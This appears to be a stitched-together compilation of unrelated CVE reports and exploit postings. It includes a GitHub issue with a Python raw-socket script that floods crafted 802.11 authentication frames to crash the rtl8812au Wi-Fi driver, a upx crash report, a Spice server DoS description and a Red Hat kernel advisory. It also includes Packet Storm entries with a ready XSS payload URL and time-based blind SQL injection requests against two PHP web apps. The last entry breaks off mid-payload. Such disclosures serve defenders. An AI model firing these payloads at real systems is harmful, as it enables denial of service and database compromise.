An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.

**testing environment**  
root@kali:~# uname -r  
5.6.0-kali2-amd64

**poc:**  
\`

#!/usr/bin/env python  
#coding=utf-8  
import time  
import socket

AP\_MAC = "00:22:66:88:22:00"  
STA\_MAC = "00:13:ef:f1:04:ef"  
ETH\_P\_ALL = 3  
IFACE = "wlan0"

def mac2str(mac):  
return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))

RADIO = "\\x00"  
RADIO += "\\x00"  
RADIO += "\\x24\\x00"  
RADIO += "\\x2f\\x40\\x00\\xa0"  
RADIO += "\\x20\\x08\\x00\\x00"  
RADIO += "\\x00\\x00\\x00\\x00"  
RADIO += "\\x27"  
RADIO += "\\x43"  
RADIO += "\\x6e\\x25"  
RADIO += "\\xa0\\x00"  
RADIO += "\\x00\\x00"  
RADIO += "\\x10\\x02"  
RADIO += "\\x6c\\x09"  
RADIO += "\\xa0\\x00"  
RADIO += "\\xd0\\x00"  
RADIO += "\\x00"  
RADIO += "\\x00"  
RADIO += "\\xd0"  
RADIO += "\\x00"

AUTH\_REQ\_OPEN = RADIO + "\\xB0" # Type/Subtype  
AUTH\_REQ\_OPEN += "\\x08" # Flags  
AUTH\_REQ\_OPEN += "\\xc3\\x50" # Duration ID  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # Desti8nation address  
AUTH\_REQ\_OPEN += mac2str(STA\_MAC) # Source address  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # BSSID  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Sequence control  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication algorithm (open)  
AUTH\_REQ\_OPEN += "\\x01\\x00" # Authentication sequence number  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication status  
AUTH\_REQ\_OPEN += "\\x1f\\xd8" # Authentication status  
AUTH\_REQ\_OPEN += "\\x5a\\x07" # Authentication status  
AUTH\_REQ\_HDR = AUTH\_REQ\_OPEN\[:-6\]

def start\_fuzz():  
s = socket.socket(socket.AF\_PACKET, socket.SOCK\_RAW, socket.htons(ETH\_P\_ALL))  
s.bind((IFACE, ETH\_P\_ALL))  
while True:  
print("send msg:",AUTH\_REQ\_OPEN)  
s.send(AUTH\_REQ\_OPEN)

def main():  
start\_fuzz()

if **name** == "**main**":  
main()  
\`  
when execute poc, we should turn on monitoring mode：  
ip link set wlan0 down  
iw dev wlan0 set type monitor  
ip link set wlan0 up

**result**

[  952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [  952.607325]  scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [  952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G           OE     5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [  952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [  952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [  952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [  952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [  952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [  952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [  952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [  952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [  952.607345] FS:  0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [  952.607346] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [  952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [  952.607365] Call Trace: [  952.607395]  nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [  952.607424]  rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [  952.607440]  ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [  952.607454]  rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [  952.607468]  join_cmd_hdl+0x267/0x373 [88XXau] [  952.607476]  rtw_cmd_thread+0x295/0x3ed [88XXau] [  952.607494]  kthread+0xf9/0x130 [  952.607504]  ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [  952.607506]  ? kthread_park+0x90/0x90 [  952.607521]  ret_from_fork+0x35/0x40 [  952.607524] ---[ end trace c0d1960d55eb317c ]---

CVE-2020-26652: fuzzing wifi ,network will down,  result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

An issue was discovered in hwclock.13-v2.27 allows attackers to gain escalated privlidges or execute arbitrary commands via the path parameter when setting the date.

CVE-2020-21583: #786804 - hwclock(8) SUID privilege escalation

Reachable Assertion vulnerability in upx before 4.0.0 allows attackers to cause a denial of service via crafted file passed to the the readx function.

**What's the problem (or question)?**

Assertion \`(unsigned)len <= buf->getSize()' failed in file.cpp:275

upx.out: file.cpp:275: virtual int InputFile::readx(MemBuffer\*, int): Assertion \`(unsigned)len <= buf\-\>getSize()' failed.
Program received signal SIGABRT, Aborted.

    pwndbg> bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7bcc859 in __GI_abort () at abort.c:79
    #2  0x00007ffff7bcc729 in __assert_fail_base (fmt=0x7ffff7d62588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=<optimized out>) at assert.c:92
    #3  0x00007ffff7bddf36 in __GI___assert_fail (assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=0x5555555f5638 "virtual int InputFile::readx(MemBuffer*, int)") at assert.c:101
    #4  0x000055555558a280 in InputFile::readx(MemBuffer*, int) ()
    #5  0x00005555555c5969 in PackUnix::packExtent(PackUnix::Extent const&, Filter*, OutputFile*, unsigned int, unsigned int) ()
    #6  0x00005555555b4fb2 in PackMachBase<N_Mach::MachClass_64<N_BELE_CTP::LEPolicy> >::pack2(OutputFile*, Filter&) ()
    #7  0x00005555555c4d98 in PackUnix::pack(OutputFile*) ()
    #8  0x00005555555d6028 in Packer::doPack(OutputFile*) ()
    #9  0x00005555555eacd3 in do_one_file(char const*, char*) ()
    #10 0x00005555555eaf8f in do_files(int, int, char**) ()
    #11 0x00005555555973c7 in upx_main(int, char**) ()
    #12 0x000055555557c4e2 in main ()
    #13 0x00007ffff7bce0b3 in __libc_start_main (main=0x55555557c3e0 <main>, argc=2, argv=0x7fffffffe208, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1f8) at ../csu/libc-start.c:308
    #14 0x000055555557c5fe in _start ()
    

**What should have happened?**

No crash.

**Do you have an idea for a solution?**

No.

**How can we reproduce the issue?**

1.make  
2../src/upx.out ./poc  
poc.zip

**Please tell us details about your environment.**

*   ./upx.out --version  
    upx 4.0.0-git-5d1347a359bb  
    UCL data compression library 1.03  
    zlib data compression library 1.2.11  
    LZMA SDK version 4.43
*   Host Operating System and version: Ubuntu 20.04 focal
*   Host CPU architecture: AMD E  
    poc.zip  
    PYC 7742 64-Core @ 16x 2.25GHz
*   Target Operating System and version: Ubuntu 20.04 focal
*   Target CPU architecture: AMD EPYC 7742 64-Core @ 16x 2.25GHz

CVE-2021-46179: Assertion `(unsigned)len <= buf->getSize()' failed in file.cpp:275 · Issue #545 · upx/upx

A stack-use-after-scope issue discovered in expand_mmac_params function in preproc.c in nasm before 2.15.04 allows remote attackers to cause a denial of service via crafted asm file.

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

'3392643?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21686: Invalid Bug ID

An issue was discovered in spice-server spice-server-0.14.0-6.el7_6.1.x86_64 of Redhat's VDI product. There is a security vulnerablility that can restart KVMvirtual machine without any authorization. It is not yet known if there will be other other effects.

**Spice-Security-Issues**

I found a security issue on spice Server when I was fuzzing Spice server.

**Introduce**

A handshake is required before the spice-server and spice-client can establish communication, spice-client will send a request containing some information that the server needs. This TCP request requires only host and port. So I constructed a malformed TCP packet that caused the vm to crash and the QEMu-KVM process to be restarted.

**How to run**

#1. Send a malformed TCP packet(Observe the packets intercepted by Wirshark)  #2. check qemu-kvm process && kvm instance state

Before sending a malformed TCP packet  
  After sending a malformed TCP packet  

#3. Check libvirt's log that the virtual machine crashed  #4. Observe the virtual machine through virt-manage, found that the virtual machine has been restarted 

**Vulnerability Code**

Code Address: https://gitlab.freedesktop.org/spice/spice/-/blob/master/server/red-stream.cpp  
Function：async\_read\_handler Description: The function async\_READ\_handler caused a deadlock while processing the data stream. 

**Related component version**

Centos: Linux version 3.10.0-957.10.2.el7.x86\_64  
Qemu-kvm: QEMU emulator version 2.10.0(qemu-kvm-ev-2.10.0-21.el7\_5.7.1)  
Spice-server rpm: spice-server-0.14.0-6.el7\_6.1.x86\_64

CVE-2020-23793: GitHub - zelat/spice-security-issues

Red Hat Security Advisory 2023-4697-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:4697-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4697  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-35788   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.77.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.77.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.77.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.77.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.77.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.77.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.77.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.77.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.ppc64le.rpm  
perf-3.10.0-1062.77.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.77.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.77.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.77.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.77.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.77.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.77.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5MPmAAoJENzjgjWX9erEJfYP/3QMiTIJEWXpTWkWEVKWe8Os  
ipFn+aPYLHGc33OMdwHuh1mmacIgs2BNxEuGimoCy6IXKuTqI7Pa//m2ASY7P+IJ  
xXNhwtuMHTffiE2BTtjlc0ziC7SNjit6K0EbUtbTGWXYl1qgdGWEhVWQ0mwAge37  
t3JMd4j1IvaIhZGLPyhH3y7lS7FSuRL+Fq9b771rHtfkjHZYcmjUivbXLphLXxFo  
PVjiMcFMzTDOk4hD6AysGuP3oKkZal41e6PRBLau7l96iNKtPXKN6JV6mu5LoHXh  
cGALKswXAyiMPmKuCBOwYgZyFQYYc4DLnskK+se+Oh2KAUTF4je8AGQPs5MTHDt7  
QEWc7CXC19JQwVALVsE43BEpDEdT6Ed9hrwyU3fEQmXsWH2vxWkcZtbo9K+UNhjG  
3QFZ83XTevmhD9d2pp0I2qEavyEUnC4t9ePpbb1VJQUQ1qrndMI6bcgoiSA7RTU7  
IgPNL3Sv7pifDnV+fAwmqaDvhUJ6RxQmNn1Y5Wwl4gvz3LHIvMwUbgBJYyhksYAz  
g/N+U/cognHdPZVIJcCV7QN7htDI7HIVNtdHiQfLT90kZV3SnZBj4cWInBchDtMW  
Pj0CYGL48vRETYlKv9yc7M10g9esJ2lIT9+rsP0W9n2SEP1Sl+SOD4puIW3eMPA1  
5CmTSUrbaoREDwMzh8dT  
=9ntR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4697-01

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

**FoccusWeb CMS 0.1 Cross Site Scripting**

Posted Aug 22, 2023

Authored by indoushka

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4ec7d01c602a400932502d010a16a7b1bacb2f323fbd9f44c16aef7baacd0231

Download | Favorite | View

**FoccusWeb CMS 0.1 Cross Site Scripting**

    ======================================================================================================================================| # Title     : FoccusWeb CMS v0.1 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : http://www.foccusweb.com/site/                                                                                       |  ======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /resultados.html?txt-busca=1<script>alert(/indoushka/);</script>&yt0=submit[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submitGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,996)
*   Arbitrary (16,211)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,452)
*   Encryption (2,370)
*   Exploit (51,936)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,782)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,795)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,185)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,380)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,786)
*   Web (9,669)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,949)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,494)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,741)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,834)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FoccusWeb CMS 0.1 Cross Site Scripting

Color Prediction Game version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Color Prediction Game v1.0 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /loginNow.php HTTP/1.1Host: localhostCookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------395879129218961020344050490865Content-Length: 434Origin: http://localhostReferer: http://localhost/login.phpSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--### Parameter & Payloads ###Parameter: MULTIPART login_mobile ((custom) POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: -----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--

Color Prediction Game 1.0 SQL Injection

Global Multi School Management System Express version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /report/balance HTTP/1.1Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcwAccept: */*X-Requested-With: XMLHttpRequestReferer: http://localhostCookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469fContent-Length: 472Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw--### Parameter & Payloads ###Parameter: MULTIPART school_id ((custom) POST)Type: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: 